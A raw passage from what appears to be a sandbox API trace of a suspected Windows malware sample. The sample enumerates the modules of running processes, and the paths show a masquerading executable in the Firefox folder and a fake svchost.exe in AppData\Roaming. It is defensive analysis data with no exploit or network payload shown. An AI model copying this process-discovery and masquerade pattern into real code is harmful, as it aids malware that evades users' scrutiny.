(dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x97c) returned 0x214 [0074.759] EnumProcessModules (in: hProcess=0x214, lphModule=0x24a99b0, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24a99b0, lpcbNeeded=0x23ee40) returned 1 [0074.760] GetModuleInformation (in: hProcess=0x214, hModule=0x8c0000, lpmodinfo=0x24a9c20, cb=0x18 | out: lpmodinfo=0x24a9c20*(lpBaseOfDll=0x8c0000, SizeOfImage=0x17000, EntryPoint=0x8c14a1)) returned 1 [0074.760] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.760] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x8c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="body_rather_heat.exe") returned 0x14 [0074.760] CoTaskMemFree (pv=0xd910e0) [0074.761] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.761] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x8c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Mozilla Firefox\\body_rather_heat.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\body_rather_heat.exe")) returned 0x3b [0074.761] CoTaskMemFree (pv=0xd910e0) [0074.761] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x24abe68, cb=0x18 | out: lpmodinfo=0x24abe68*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0074.761] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.761] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0074.762] CoTaskMemFree (pv=0xd910e0) [0074.762] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.762] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0074.763] CoTaskMemFree (pv=0xd910e0) [0074.763] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x24ae028, cb=0x18 | out: lpmodinfo=0x24ae028*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0074.763] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.763] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0074.763] CoTaskMemFree (pv=0xd910e0) [0074.763] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.763] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0074.764] CoTaskMemFree (pv=0xd910e0) [0074.764] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x24b01e8, cb=0x18 | out: lpmodinfo=0x24b01e8*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0074.764] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.764] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0074.765] CoTaskMemFree (pv=0xd910e0) [0074.765] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.765] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0074.766] CoTaskMemFree (pv=0xd910e0) [0074.766] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x24b23b8, cb=0x18 | out: lpmodinfo=0x24b23b8*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0074.766] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.766] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0074.767] CoTaskMemFree (pv=0xd910e0) [0074.767] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.767] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0074.767] CoTaskMemFree (pv=0xd910e0) [0074.767] CloseHandle (hObject=0x214) returned 1 [0074.768] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0074.769] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x414) returned 0x214 [0074.769] EnumProcessModules (in: hProcess=0x214, lphModule=0x24b4ad8, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24b4ad8, lpcbNeeded=0x23ee40) returned 1 [0074.773] EnumProcessModules (in: hProcess=0x214, lphModule=0x24b4d08, cb=0x400, lpcbNeeded=0x23ee40 | out: lphModule=0x24b4d08, lpcbNeeded=0x23ee40) returned 1 [0074.776] GetModuleInformation (in: hProcess=0x214, hModule=0xff760000, lpmodinfo=0x24b5178, cb=0x18 | out: lpmodinfo=0x24b5178*(lpBaseOfDll=0xff760000, SizeOfImage=0xb000, EntryPoint=0xff76246c)) returned 1 [0074.777] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.777] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xff760000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="svchost.exe") returned 0xb [0074.777] CoTaskMemFree (pv=0xd910e0) [0074.777] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.777] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xff760000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0074.778] CoTaskMemFree (pv=0xd910e0) [0074.778] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x24b7370, cb=0x18 | out: lpmodinfo=0x24b7370*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0074.778] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.778] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0074.778] CoTaskMemFree (pv=0xd910e0) [0074.778] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.778] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0074.779] CoTaskMemFree (pv=0xd910e0) [0074.779] GetModuleInformation (in: hProcess=0x214, hModule=0x77710000, lpmodinfo=0x24b9530, cb=0x18 | out: lpmodinfo=0x24b9530*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0074.779] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.779] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77710000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0074.780] CoTaskMemFree (pv=0xd910e0) [0074.780] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.780] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77710000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0074.780] CoTaskMemFree (pv=0xd910e0) [0074.780] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd910000, lpmodinfo=0x24bb700, cb=0x18 | out: lpmodinfo=0x24bb700*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0074.781] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.781] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd910000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0074.781] CoTaskMemFree (pv=0xd910e0) [0074.781] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.781] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd910000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0074.782] CoTaskMemFree (pv=0xd910e0) [0074.782] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff100000, lpmodinfo=0x24bd8d0, cb=0x18 | out: lpmodinfo=0x24bd8d0*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0074.782] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.782] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff100000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0074.783] CoTaskMemFree (pv=0xd910e0) [0074.783] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.783] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff100000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0074.784] CoTaskMemFree (pv=0xd910e0) [0074.784] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefee80000, lpmodinfo=0x24bfae8, cb=0x18 | out: lpmodinfo=0x24bfae8*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0074.784] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.784] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefee80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0074.785] CoTaskMemFree (pv=0xd910e0) [0074.785] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.785] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefee80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0074.786] CoTaskMemFree (pv=0xd910e0) [0074.786] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdb50000, lpmodinfo=0x24c1ca8, cb=0x18 | out: lpmodinfo=0x24c1ca8*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0074.787] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.787] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdb50000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0074.787] CoTaskMemFree (pv=0xd910e0) [0074.787] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.788] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdb50000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0074.788] CoTaskMemFree (pv=0xd910e0) [0074.788] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff760000, lpmodinfo=0x24c3e68, cb=0x18 | out: lpmodinfo=0x24c3e68*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0074.790] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.790] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff760000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0074.790] CoTaskMemFree (pv=0xd910e0) [0074.791] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.791] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff760000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0074.791] CoTaskMemFree (pv=0xd910e0) [0074.791] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff1c0000, lpmodinfo=0x24c6028, cb=0x18 | out: lpmodinfo=0x24c6028*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0074.792] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.792] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff1c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0074.793] CoTaskMemFree (pv=0xd910e0) [0074.793] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.793] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff1c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0074.794] CoTaskMemFree (pv=0xd910e0) [0074.794] GetModuleInformation (in: hProcess=0x214, hModule=0x77610000, lpmodinfo=0x24c8280, cb=0x18 | out: lpmodinfo=0x24c8280*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0074.795] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.795] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77610000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0074.795] CoTaskMemFree (pv=0xd910e0) [0074.795] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.795] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77610000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0074.796] CoTaskMemFree (pv=0xd910e0) [0074.796] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff350000, lpmodinfo=0x24ca440, cb=0x18 | out: lpmodinfo=0x24ca440*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0074.797] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.797] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff350000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0074.798] CoTaskMemFree (pv=0xd910e0) [0074.798] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.798] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff350000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0074.799] CoTaskMemFree (pv=0xd910e0) [0074.799] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff690000, lpmodinfo=0x24cc5f0, cb=0x18 | out: lpmodinfo=0x24cc5f0*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0074.800] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.800] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff690000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0074.801] CoTaskMemFree (pv=0xd910e0) [0074.801] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.801] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff690000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0074.802] CoTaskMemFree (pv=0xd910e0) [0074.802] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff400000, lpmodinfo=0x24ce7b0, cb=0x18 | out: lpmodinfo=0x24ce7b0*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0074.803] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.803] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff400000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0074.804] CoTaskMemFree (pv=0xd910e0) [0074.804] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.804] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff400000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0074.805] CoTaskMemFree (pv=0xd910e0) [0074.805] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9d0000, lpmodinfo=0x24d0970, cb=0x18 | out: lpmodinfo=0x24d0970*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0074.806] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.806] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0074.807] CoTaskMemFree (pv=0xd910e0) [0074.807] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.807] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0074.808] CoTaskMemFree (pv=0xd910e0) [0074.808] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd670000, lpmodinfo=0x24d2b30, cb=0x18 | out: lpmodinfo=0x24d2b30*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0074.809] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.809] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd670000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0074.810] CoTaskMemFree (pv=0xd910e0) [0074.810] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.811] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd670000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0074.812] CoTaskMemFree (pv=0xd910e0) [0074.812] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff430000, lpmodinfo=0x24d4d00, cb=0x18 | out: lpmodinfo=0x24d4d00*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0074.813] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.813] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff430000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0074.814] CoTaskMemFree (pv=0xd910e0) [0074.814] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.814] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff430000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0074.815] CoTaskMemFree (pv=0xd910e0) [0074.815] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff970000, lpmodinfo=0x24d6ed0, cb=0x18 | out: lpmodinfo=0x24d6ed0*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0074.816] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.816] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff970000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0074.818] CoTaskMemFree (pv=0xd910e0) [0074.818] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.818] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff970000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0074.819] CoTaskMemFree (pv=0xd910e0) [0074.819] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9c0000, lpmodinfo=0x24d91c0, cb=0x18 | out: lpmodinfo=0x24d91c0*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0074.820] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.820] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0074.822] CoTaskMemFree (pv=0xd910e0) [0074.822] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.822] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0074.823] CoTaskMemFree (pv=0xd910e0) [0074.823] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefce90000, lpmodinfo=0x24db370, cb=0x18 | out: lpmodinfo=0x24db370*(lpBaseOfDll=0x7fefce90000, SizeOfImage=0x5b000, EntryPoint=0x7fefce96940)) returned 1 [0074.824] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.824] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefce90000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="DNSAPI.dll") returned 0xa [0074.825] CoTaskMemFree (pv=0xd910e0) [0074.825] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.825] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefce90000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\DNSAPI.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0074.827] CoTaskMemFree (pv=0xd910e0) [0074.827] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb260000, lpmodinfo=0x24dd530, cb=0x18 | out: lpmodinfo=0x24dd530*(lpBaseOfDll=0x7fefb260000, SizeOfImage=0xb000, EntryPoint=0x7fefb261198)) returned 1 [0074.828] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.828] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb260000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0074.829] CoTaskMemFree (pv=0xd910e0) [0074.829] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.829] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb260000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\WINNSI.DLL" (normalized: "c:\\windows\\system32\\winnsi.dll")) returned 0x1e [0074.831] CoTaskMemFree (pv=0xd910e0) [0074.831] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefac50000, lpmodinfo=0x24df6f0, cb=0x18 | out: lpmodinfo=0x24df6f0*(lpBaseOfDll=0x7fefac50000, SizeOfImage=0x53000, EntryPoint=0x7fefac52b98)) returned 1 [0074.832] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.832] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefac50000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="Fwpuclnt.dll") returned 0xc [0074.834] CoTaskMemFree (pv=0xd910e0) [0074.834] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.834] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefac50000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\Fwpuclnt.dll" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")) returned 0x20 [0074.835] CoTaskMemFree (pv=0xd910e0) [0074.835] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcb00000, lpmodinfo=0x24e18c0, cb=0x18 | out: lpmodinfo=0x24e18c0*(lpBaseOfDll=0x7fefcb00000, SizeOfImage=0x1b000, EntryPoint=0x7fefcb02068)) returned 1 [0074.836] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.836] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcb00000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="GPAPI.dll") returned 0x9 [0074.838] CoTaskMemFree (pv=0xd910e0) [0074.838] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.838] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcb00000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GPAPI.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")) returned 0x1d [0074.840] CoTaskMemFree (pv=0xd910e0) [0074.840] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd760000, lpmodinfo=0x24e3a80, cb=0x18 | out: lpmodinfo=0x24e3a80*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0074.841] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.841] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd760000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0074.842] CoTaskMemFree (pv=0xd910e0) [0074.843] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.843] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd760000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0074.844] CoTaskMemFree (pv=0xd910e0) [0074.844] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd010000, lpmodinfo=0x24e5c50, cb=0x18 | out: lpmodinfo=0x24e5c50*(lpBaseOfDll=0x7fefd010000, SizeOfImage=0x55000, EntryPoint=0x7fefd011054)) returned 1 [0074.846] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.846] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd010000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0074.847] CoTaskMemFree (pv=0xd910e0) [0074.847] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.847] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd010000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")) returned 0x1f [0074.849] CoTaskMemFree (pv=0xd910e0) [0074.849] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd000000, lpmodinfo=0x24e7e10, cb=0x18 | out: lpmodinfo=0x24e7e10*(lpBaseOfDll=0x7fefd000000, SizeOfImage=0x7000, EntryPoint=0x7fefd00142c)) returned 1 [0074.850] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.850] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd000000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wship6.dll") returned 0xa [0074.852] CoTaskMemFree (pv=0xd910e0) [0074.852] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.852] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd000000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")) returned 0x1e [0074.854] CoTaskMemFree (pv=0xd910e0) [0074.854] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb270000, lpmodinfo=0x24e9fd0, cb=0x18 | out: lpmodinfo=0x24e9fd0*(lpBaseOfDll=0x7fefb270000, SizeOfImage=0x27000, EntryPoint=0x7fefb2798bc)) returned 1 [0074.856] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.856] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb270000, 